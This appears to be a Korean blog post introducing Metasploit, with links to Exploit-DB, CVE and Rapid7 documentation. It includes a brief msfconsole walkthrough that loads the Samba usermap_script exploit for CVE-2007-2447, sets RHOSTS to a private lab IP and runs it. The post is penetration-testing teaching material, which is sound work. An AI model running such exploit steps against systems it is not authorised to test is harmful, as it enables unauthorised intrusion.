Rapid7 사에서 운영하는 오픈소스 취약점 테스트 소프트웨어 프레임워크
https://taesam.tistory.com/28
취약점 확인
-
http://www.exploit-db.com
OffSec’s Exploit Database Archive
www.exploit-db.com
CVE - CVE
The mission of the CVE® Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
cve.mitre.org
Exploit 해보기
- 칼리 리눅스의 metasploit framework를 이용하기 위해 다음 명령어 실행
(명령어) msfconsole
공격모듈 검색
(명령어) search CVE-2007-2447
use 명령어로 스크립트 장착 확인
(명령어) use exploit/multi/samba/usermap_script
info 명령어로 필요한 옵션 확인
show options명령어로 옵션 확인
set 명령어로 옵션 설정 후 공격진행
(명령어) set Rhosts 192.168.79.2
(명령어) exploit
AWS에서 Metasploit 설치하기
https://blog.naver.com/chogar/80164849517
AWS에 Metasploit 운영
※ 주의사항 아래 공격 코드는 연구 목적으로 작성된 것이며, 허가 받지 않은 공간에서는 테스트를 절대 금...
blog.naver.com
https://docs.rapid7.com/metasploit/installing-metasploit-pro
Installing Metasploit Pro | Metasploit Documentation
docs.rapid7.com
'④ IT 스타트 (IT Competence) > Tools' 카테고리의 다른 글
| 취약점 스캐너 : Nexpose (0) | 2025.02.17 |
|---|---|
| Forcepoint Insider Threat (0) | 2025.02.04 |
| syslog로 로그를 쏘는 방법 : beats툴 활용 (1) | 2024.12.05 |
| APM Tool : 미들웨어 모니터링, Jennifer, Scouter(오픈소스), cloudwatch(AWS) (2) | 2024.11.29 |
| 딥스캔 , Deepscan : Code Inspection 툴 (1) | 2024.11.13 |